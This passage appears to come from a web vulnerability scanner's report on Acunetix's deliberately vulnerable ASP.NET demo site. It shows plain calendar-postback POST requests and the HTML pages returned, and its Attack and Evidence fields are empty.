(XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8555&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCA16OOZNsIZGRkprk0QDKZDe5cp5jSmLrmtd%2Ft9Wk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLM79apBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMoh9GMLhoZQxocQK0jVa7W5zbcqs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:51 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCA16OOZNsIZGRkprk0QDKZDe5cp5jSmLrmtd/t9Wk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLM79apBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMoh9GMLhoZQxocQK0jVa7W5zbcqs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:White" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8308&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAz7d2otoIZGRkJPAa1EsC4ttFEK7RUEWe3yV6%2BpM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLMmsnmCgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLnkPsvfEJ0WTxcTo1HQfGJUrNzfg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:42 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAz7d2otoIZGRkJPAa1EsC4ttFEK7RUEWe3yV6+pM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLMmsnmCgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLnkPsvfEJ0WTxcTo1HQfGJUrNzfg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:White" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET 